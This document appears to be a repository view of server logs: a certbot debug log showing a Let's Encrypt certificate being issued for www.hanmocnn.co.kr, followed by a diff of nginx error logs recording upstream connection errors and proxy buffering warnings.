"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658763864386"
],
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480355794976",
"certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/06c23a86319133c2ea94bad6232b83edc89c"
}
2026-02-14 22:37:11,174:DEBUG:acme.client:Storing nonce: qLPTsdtftOchIQ67pfn4fKf79QhHr462qCSymeexd-q0zApziWM
2026-02-14 22:37:11,175:DEBUG:acme.client:JWS payload:
b''
2026-02-14 22:37:11,179:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/06c23a86319133c2ea94bad6232b83edc89c:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZnRPY2hJUTY3cGZuNGZLZjc5UWhIcjQ2MnFDU3ltZWV4ZC1xMHpBcHppV00iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDZjMjNhODYzMTkxMzNjMmVhOTRiYWQ2MjMyYjgzZWRjODljIn0",
"signature": "QObbXJhGMj8ENq_5FuuPvJ8yHgVPCuys_JsABmNxTiw9xTW36mNVjZiJMWVEGFHVxM6ZGEZlzhWnnp0T3kbdmheU4LYto8C80WL5vp7h2a3ecjkqgeV3COGQ_QhVFbsAJY9rAtQ7CuO72r6VS8Tf1K_AEcbCBJzoqLJU55htt1jPmaEmAhUuKy9QFLcE5fGMtnzbP4nRW_swr-3tmm89-zC5-BJ5TuosNe8iZy6wjsm33i-AEhoIoS9BRfUZhSFxobsQb8pTV4_LYFKHjG1wgrx2XmWy4GWwN6E-NGH6jehlfPU22XBRSSmD4YobWbNHMs61CeO_y-cXUDpZGUlVrQ",
"payload": ""
}
2026-02-14 22:37:11,372:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/06c23a86319133c2ea94bad6232b83edc89c HTTP/1.1" 200 2901
2026-02-14 22:37:11,373:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 22:37:11 GMT
Content-Type: application/pem-certificate-chain
Content-Length: 2901
Connection: keep-alive
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/cert/06c23a86319133c2ea94bad6232b83edc89c/1>;rel="alternate"
Replay-Nonce: qLPTsdtf7TDw9twhO-dJQIwEaE7M6NSgQWEZQc1cW3y0Qsc0R3I
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
-----BEGIN CERTIFICATE-----
MIIDrDCCAzGgAwIBAgISBsI6hjGRM8LqlLrWIyuD7cicMAoGCCqGSM49BAMDMDIx
CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF
ODAeFw0yNjAyMTQyMTM4MzhaFw0yNjA1MTUyMTM4MzdaMB0xGzAZBgNVBAMTEnd3
dy5oYW5tb2Nubi5jby5rcjB2MBAGByqGSM49AgEGBSuBBAAiA2IABPzAMUvKjO5X
zitBgqZIxSvhrau1vptwO0tb9gqRkNEMlY4JYC03iBAzJn8/61Q6cSTMPQY5WMd5
3KLX2RapvmpZINQkgfLsxpr+MFWTvWDKoKtTWJp9ft2+mryQYeiYD6OCAh0wggIZ
MA4GA1UdDwEB/wQEAwIHgDATBgNVHSUEDDAKBggrBgEFBQcDATAMBgNVHRMBAf8E
AjAAMB0GA1UdDgQWBBTORiT+dlglG67cimuM1zKD3ELnZTAfBgNVHSMEGDAWgBSP
DROi9i5+0VBsMxg4XVmOI3KRyjAyBggrBgEFBQcBAQQmMCQwIgYIKwYBBQUHMAKG
Fmh0dHA6Ly9lOC5pLmxlbmNyLm9yZy8wHQYDVR0RBBYwFIISd3d3Lmhhbm1vY25u
LmNvLmtyMBMGA1UdIAQMMAowCAYGZ4EMAQIBMC0GA1UdHwQmMCQwIqAgoB6GHGh0
dHA6Ly9lOC5jLmxlbmNyLm9yZy8yOS5jcmwwggELBgorBgEEAdZ5AgQCBIH8BIH5
APcAdQBkEcRspBLsp4kcogIuALyrTygH1B41J6vq/tUDyX3N8AAAAZxeTPmgAAAE
AwBGMEQCIGxlMBiH9/OnPSvVEujhbNVUSxq/r1Xngcn4TfBZaVGrAiAkIOVzdb/9
6AKFMX/ElKQ+7I+hpxNt171wuuDeEjgLkAB+AOMjjfKNoojgquCs8PqQyYXwtr/1
0qUnsAH8HERYxLboAAABnF5M/BQACAAABQAymAnXBAMARzBFAiEArvxAvG9uE2Tu
DDEeVhOZqlCxIN4TPjui3hiU+mrKZjkCIDizPzKN4wLVM22r8q+oVeOTtAsRHvGX
fwG9AX9le6neMAoGCCqGSM49BAMDA2kAMGYCMQCMzvyXShGR+CTivx802AAWc6AY
gthWXK7x71B1cXqasqwYOiDM+YUFwYHALE+u+iwCMQDMXxRf8NuIx6cPsKSX6vOc
O0tAcvgdvPwBxoXi5cg4Qa96OiXsH8KioJwDWPbj6xs=
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
MIIEVjCCAj6gAwIBAgIQY5WTY8JOcIJxWRi/w9ftVjANBgkqhkiG9w0BAQsFADBP
MQswCQYDVQQGEwJVUzEpMCcGA1UEChMgSW50ZXJuZXQgU2VjdXJpdHkgUmVzZWFy
Y2ggR3JvdXAxFTATBgNVBAMTDElTUkcgUm9vdCBYMTAeFw0yNDAzMTMwMDAwMDBa
Fw0yNzAzMTIyMzU5NTlaMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBF
bmNyeXB0MQswCQYDVQQDEwJFODB2MBAGByqGSM49AgEGBSuBBAAiA2IABNFl8l7c
S7QMApzSsvru6WyrOq44ofTUOTIzxULUzDMMNMchIJBwXOhiLxxxs0LXeb5GDcHb
R6EToMffgSZjO9SNHfY9gjMy9vQr5/WWOrQTZxh7az6NSNnq3u2ubT6HTKOB+DCB
9TAOBgNVHQ8BAf8EBAMCAYYwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMB
MBIGA1UdEwEB/wQIMAYBAf8CAQAwHQYDVR0OBBYEFI8NE6L2Ln7RUGwzGDhdWY4j
cpHKMB8GA1UdIwQYMBaAFHm0WeZ7tuXkAXOACIjIGlj26ZtuMDIGCCsGAQUFBwEB
BCYwJDAiBggrBgEFBQcwAoYWaHR0cDovL3gxLmkubGVuY3Iub3JnLzATBgNVHSAE
DDAKMAgGBmeBDAECATAnBgNVHR8EIDAeMBygGqAYhhZodHRwOi8veDEuYy5sZW5j
ci5vcmcvMA0GCSqGSIb3DQEBCwUAA4ICAQBnE0hGINKsCYWi0Xx1ygxD5qihEjZ0
RI3tTZz1wuATH3ZwYPIp97kWEayanD1j0cDhIYzy4CkDo2jB8D5t0a6zZWzlr98d
AQFNh8uKJkIHdLShy+nUyeZxc5bNeMp1Lu0gSzE4McqfmNMvIpeiwWSYO9w82Ob8
otvXcO2JUYi3svHIWRm3+707DUbL51XMcY2iZdlCq4Wa9nbuk3WTU4gr6LY8MzVA
aDQG2+4U3eJ6qUF10bBnR1uuVyDYs9RhrwucRVnfuDj29CMLTsplM5f5wSV5hUpm
Uwp/vV7M4w4aGunt74koX71n4EdagCsL/Yk5+mAQU0+tue0JOfAV/R6t1k+Xk9s2
HMQFeoxppfzAVC04FdG9M+AC2JWxmFSt6BCuh3CEey3fE52Qrj9YM75rtvIjsm/1
Hl+u//Wqxnu1ZQ4jpa+VpuZiGOlWrqSP9eogdOhCGisnyewWJwRQOqK16wiGyZeR
xs/Bekw65vwSIaVkBruPiTfMOo0Zh4gVa8/qJgMbJbyrwwG97z/PRgmLKCDl8z3d
tA0Z7qq7fta0Gl24uyuB05dqI5J1LvAzKuWdIjT1tP8qCoxSE/xpix8hX2dt3h+/
jujUgFPFZ0EVZ0xSyBNRF3MboGZnYXFUxpNjTWPKpagDHJQmqrAcDmWJnMsFY3jS
u1igv3OefnWjSQ==
-----END CERTIFICATE-----
2026-02-14 22:37:11,373:DEBUG:acme.client:Storing nonce: qLPTsdtf7TDw9twhO-dJQIwEaE7M6NSgQWEZQc1cW3y0Qsc0R3I
2026-02-14 22:37:11,374:DEBUG:acme.client:JWS payload:
b''
2026-02-14 22:37:11,378:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/06c23a86319133c2ea94bad6232b83edc89c/1:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZjdURHc5dHdoTy1kSlFJd0VhRTdNNk5TZ1FXRVpRYzFjVzN5MFFzYzBSM0kiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDZjMjNhODYzMTkxMzNjMmVhOTRiYWQ2MjMyYjgzZWRjODljLzEifQ",
"signature": "uu2PvwRtaxBS1QWdF_MOhZwLzyiYka_x_4ps9bxP_QS3xI9IR7VtV0_neoEBGCLqFCVL3iIIUmsCDLtsXc_u9p_s39ENtIL24UiY_UrmgLvj_HFe8sBxap-xz52WXT_9NYOkaP26eyEsH-17HGQzgEkEJ1DYSqiGEhDKx8nEaOPIKFXvNhxL7nDCgFl2Klcby9cuYQlvnLulhsfKjFPYDc0tB8kx4fxwZ6wQjZ7l3zTP3AicvsUc2AP_4e13k3lkieQtwUebu8Tiv6NvOnQMMBSQwywDa09tXJpyDDWMDbjvAgATPSA1HR4NL3AY4ADE8qRG9zyGx4VTH4pQS9xS7A",
"payload": ""
}
2026-02-14 22:37:11,555:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/06c23a86319133c2ea94bad6232b83edc89c/1 HTTP/1.1" 200 2336
2026-02-14 22:37:11,555:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 22:37:11 GMT
Content-Type: application/pem-certificate-chain
Content-Length: 2336
Connection: keep-alive
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/cert/06c23a86319133c2ea94bad6232b83edc89c/0>;rel="alternate"
Replay-Nonce: qLPTsdtfwihD2UbAkXWUlDlC5JvHa190X7NLtkceYR52txIHYoY
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
-----BEGIN CERTIFICATE-----
MIIDrDCCAzGgAwIBAgISBsI6hjGRM8LqlLrWIyuD7cicMAoGCCqGSM49BAMDMDIx
CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF
ODAeFw0yNjAyMTQyMTM4MzhaFw0yNjA1MTUyMTM4MzdaMB0xGzAZBgNVBAMTEnd3
dy5oYW5tb2Nubi5jby5rcjB2MBAGByqGSM49AgEGBSuBBAAiA2IABPzAMUvKjO5X
zitBgqZIxSvhrau1vptwO0tb9gqRkNEMlY4JYC03iBAzJn8/61Q6cSTMPQY5WMd5
3KLX2RapvmpZINQkgfLsxpr+MFWTvWDKoKtTWJp9ft2+mryQYeiYD6OCAh0wggIZ
MA4GA1UdDwEB/wQEAwIHgDATBgNVHSUEDDAKBggrBgEFBQcDATAMBgNVHRMBAf8E
AjAAMB0GA1UdDgQWBBTORiT+dlglG67cimuM1zKD3ELnZTAfBgNVHSMEGDAWgBSP
DROi9i5+0VBsMxg4XVmOI3KRyjAyBggrBgEFBQcBAQQmMCQwIgYIKwYBBQUHMAKG
Fmh0dHA6Ly9lOC5pLmxlbmNyLm9yZy8wHQYDVR0RBBYwFIISd3d3Lmhhbm1vY25u
LmNvLmtyMBMGA1UdIAQMMAowCAYGZ4EMAQIBMC0GA1UdHwQmMCQwIqAgoB6GHGh0
dHA6Ly9lOC5jLmxlbmNyLm9yZy8yOS5jcmwwggELBgorBgEEAdZ5AgQCBIH8BIH5
APcAdQBkEcRspBLsp4kcogIuALyrTygH1B41J6vq/tUDyX3N8AAAAZxeTPmgAAAE
AwBGMEQCIGxlMBiH9/OnPSvVEujhbNVUSxq/r1Xngcn4TfBZaVGrAiAkIOVzdb/9
6AKFMX/ElKQ+7I+hpxNt171wuuDeEjgLkAB+AOMjjfKNoojgquCs8PqQyYXwtr/1
0qUnsAH8HERYxLboAAABnF5M/BQACAAABQAymAnXBAMARzBFAiEArvxAvG9uE2Tu
DDEeVhOZqlCxIN4TPjui3hiU+mrKZjkCIDizPzKN4wLVM22r8q+oVeOTtAsRHvGX
fwG9AX9le6neMAoGCCqGSM49BAMDA2kAMGYCMQCMzvyXShGR+CTivx802AAWc6AY
gthWXK7x71B1cXqasqwYOiDM+YUFwYHALE+u+iwCMQDMXxRf8NuIx6cPsKSX6vOc
O0tAcvgdvPwBxoXi5cg4Qa96OiXsH8KioJwDWPbj6xs=
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
MIICtTCCAjugAwIBAgIQfo8UX4exWTMtf9QIK4JraTAKBggqhkjOPQQDAzBPMQsw
CQYDVQQGEwJVUzEpMCcGA1UEChMgSW50ZXJuZXQgU2VjdXJpdHkgUmVzZWFyY2gg
R3JvdXAxFTATBgNVBAMTDElTUkcgUm9vdCBYMjAeFw0yNDAzMTMwMDAwMDBaFw0y
NzAzMTIyMzU5NTlaMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNy
eXB0MQswCQYDVQQDEwJFODB2MBAGByqGSM49AgEGBSuBBAAiA2IABNFl8l7cS7QM
ApzSsvru6WyrOq44ofTUOTIzxULUzDMMNMchIJBwXOhiLxxxs0LXeb5GDcHbR6ET
oMffgSZjO9SNHfY9gjMy9vQr5/WWOrQTZxh7az6NSNnq3u2ubT6HTKOB+DCB9TAO
BgNVHQ8BAf8EBAMCAYYwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMBMBIG
A1UdEwEB/wQIMAYBAf8CAQAwHQYDVR0OBBYEFI8NE6L2Ln7RUGwzGDhdWY4jcpHK
MB8GA1UdIwQYMBaAFHxClq7eS0g7+pL4nozPbYupcjeVMDIGCCsGAQUFBwEBBCYw
JDAiBggrBgEFBQcwAoYWaHR0cDovL3gyLmkubGVuY3Iub3JnLzATBgNVHSAEDDAK
MAgGBmeBDAECATAnBgNVHR8EIDAeMBygGqAYhhZodHRwOi8veDIuYy5sZW5jci5v
cmcvMAoGCCqGSM49BAMDA2gAMGUCMQClsUNJdX36GE+o2yDf7L02m3P3ElVWRLls
5ZyLYPjcNamBxRB9gZYoj24mGZtP3GkCMASZcALg6kpScomqIIjVHXRUQ500cdl4
4n7fhxwokLo/lVlO8YyHwAi7ejTHtvw9Vg==
-----END CERTIFICATE-----
2026-02-14 22:37:11,555:DEBUG:acme.client:Storing nonce: qLPTsdtfwihD2UbAkXWUlDlC5JvHa190X7NLtkceYR52txIHYoY
2026-02-14 22:37:11,572:INFO:certbot._internal.client:Non-standard path(s), might not work with crontab installed by your operating system package manager
2026-02-14 22:37:11,573:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/archive.
2026-02-14 22:37:11,573:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/live.
2026-02-14 22:37:11,573:DEBUG:certbot._internal.storage:Writing README to /etc/letsencrypt/live/README.
2026-02-14 22:37:11,573:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/archive/npm-1.
2026-02-14 22:37:11,574:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/live/npm-1.
2026-02-14 22:37:11,574:DEBUG:certbot._internal.storage:Writing certificate to /etc/letsencrypt/live/npm-1/cert.pem.
2026-02-14 22:37:11,574:DEBUG:certbot._internal.storage:Writing private key to /etc/letsencrypt/live/npm-1/privkey.pem.
2026-02-14 22:37:11,574:DEBUG:certbot._internal.storage:Writing chain to /etc/letsencrypt/live/npm-1/chain.pem.
2026-02-14 22:37:11,574:DEBUG:certbot._internal.storage:Writing full chain to /etc/letsencrypt/live/npm-1/fullchain.pem.
2026-02-14 22:37:11,574:DEBUG:certbot._internal.storage:Writing README to /etc/letsencrypt/live/npm-1/README.
2026-02-14 22:37:11,585:DEBUG:certbot.configuration:Var account=ce2ddac5740bb12d4d6591b7fa1728af (set by user).
2026-02-14 22:37:11,585:DEBUG:certbot.configuration:Var key_type=ecdsa (set by user).
2026-02-14 22:37:11,585:DEBUG:certbot.configuration:Var elliptic_curve=secp384r1 (set by user).
2026-02-14 22:37:11,586:DEBUG:certbot.configuration:Var preferred_chain=ISRG Root X1 (set by user).
2026-02-14 22:37:11,586:DEBUG:certbot.configuration:Var pref_challs=['http-01'] (set by user).
2026-02-14 22:37:11,586:DEBUG:certbot.configuration:Var config_dir=/etc/letsencrypt (set by user).
2026-02-14 22:37:11,586:DEBUG:certbot.configuration:Var work_dir=/tmp/letsencrypt-lib (set by user).
2026-02-14 22:37:11,586:DEBUG:certbot.configuration:Var logs_dir=/data/logs (set by user).
2026-02-14 22:37:11,586:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
2026-02-14 22:37:11,586:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
2026-02-14 22:37:11,586:DEBUG:certbot.configuration:Var webroot_path=['/data/letsencrypt-acme-challenge'] (set by user).
2026-02-14 22:37:11,586:DEBUG:certbot.configuration:Var webroot_map={'www.hanmocnn.co.kr': '/data/letsencrypt-acme-challenge'} (set by user).
2026-02-14 22:37:11,589:DEBUG:certbot._internal.display.obj:Notifying user:
Successfully received certificate.
Certificate is saved at: /etc/letsencrypt/live/npm-1/fullchain.pem
Key is saved at: /etc/letsencrypt/live/npm-1/privkey.pem
This certificate expires on 2026-05-15.
These files will be updated when the certificate renews.
2026-02-14 22:37:11,589:DEBUG:certbot._internal.display.obj:Notifying user: NEXT STEPS:
2026-02-14 22:37:11,589:DEBUG:certbot._internal.display.obj:Notifying user: - The certificate will need to be renewed before it expires. Certbot can automatically renew the certificate in the background, but you may need to take steps to enable that functionality. See https://certbot.org/renewal-setup for instructions.
2026-02-14 22:37:11,592:DEBUG:certbot._internal.display.obj:Notifying user: If you like Certbot, please consider supporting our work by:
* Donating to ISRG / Let's Encrypt: https://letsencrypt.org/donate
* Donating to EFF: https://eff.org/donate-le

File diff suppressed because it is too large Load Diff

View File

@@ -1,650 +1,102 @@
2026/02/14 22:37:21 [error] 261#261: *54 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.18.0.3:80/", host: "www.hanmocnn.co.kr" 2026/02/18 23:58:37 [warn] 985#985: *104319 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/62/0000020622 while reading upstream, client: 74.7.229.221, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:37:21 [error] 261#261: *54 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://172.18.0.3:80/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" 2026/02/18 23:58:40 [warn] 986#986: *104324 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/62/0000020623 while reading upstream, client: 74.7.229.19, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:50:21 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr" 2026/02/18 23:58:49 [warn] 987#987: *104330 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/62/0000020624 while reading upstream, client: 74.7.243.44, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:50:21 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr" 2026/02/18 23:58:53 [warn] 990#990: *104334 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/62/0000020625 while reading upstream, client: 74.7.242.172, server: hanmocnn.co.kr, request: "GET /assets/images/instrument.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/instrument.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:50:21 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr" 2026/02/18 23:58:55 [warn] 990#990: *104334 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/62/0000020626 while reading upstream, client: 74.7.242.172, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:50:21 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr" 2026/02/18 23:59:00 [warn] 989#989: *104327 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/62/0000020627 while reading upstream, client: 74.7.228.139, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:50:21 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" 2026/02/19 00:38:57 [warn] 985#985: *104360 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/62/0000020628 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:50:21 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" 2026/02/19 00:38:57 [warn] 985#985: *104360 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/62/0000020629 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:50:21 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://172.22.1.15:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" 2026/02/19 00:38:57 [warn] 985#985: *104360 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/63/0000020630 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:50:21 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://172.22.1.15:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" 2026/02/19 00:38:58 [warn] 985#985: *104360 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/63/0000020631 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:50:32 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr" 2026/02/19 00:40:01 [warn] 985#985: *104360 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/63/0000020632 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:50:32 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://172.22.1.15:8081/", host: "www.hanmocnn.co.kr" 2026/02/19 00:42:47 [warn] 985#985: *104420 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/63/0000020633 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:50:32 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr" 2026/02/19 00:42:47 [warn] 985#985: *104420 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/63/0000020634 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:50:32 [warn] 222#222: *22 upstream server temporarily disabled while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET / HTTP/2.0", upstream: "https://[fd4d:6169:6c63:6f77::14]:8081/", host: "www.hanmocnn.co.kr" 2026/02/19 00:42:47 [warn] 985#985: *104420 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/63/0000020635 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/14 22:50:32 [error] 222#222: *22 connect() failed (111: Connection refused) while connecting to upstream, client: 222.117.41.51, server: www.hanmocnn.co.kr, request: "GET /favicon.ico HTTP/2.0", upstream: "https://172.22.1.15:8081/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/" 2026/02/19 00:43:45 [warn] 985#985: *104420 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/63/0000020636 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
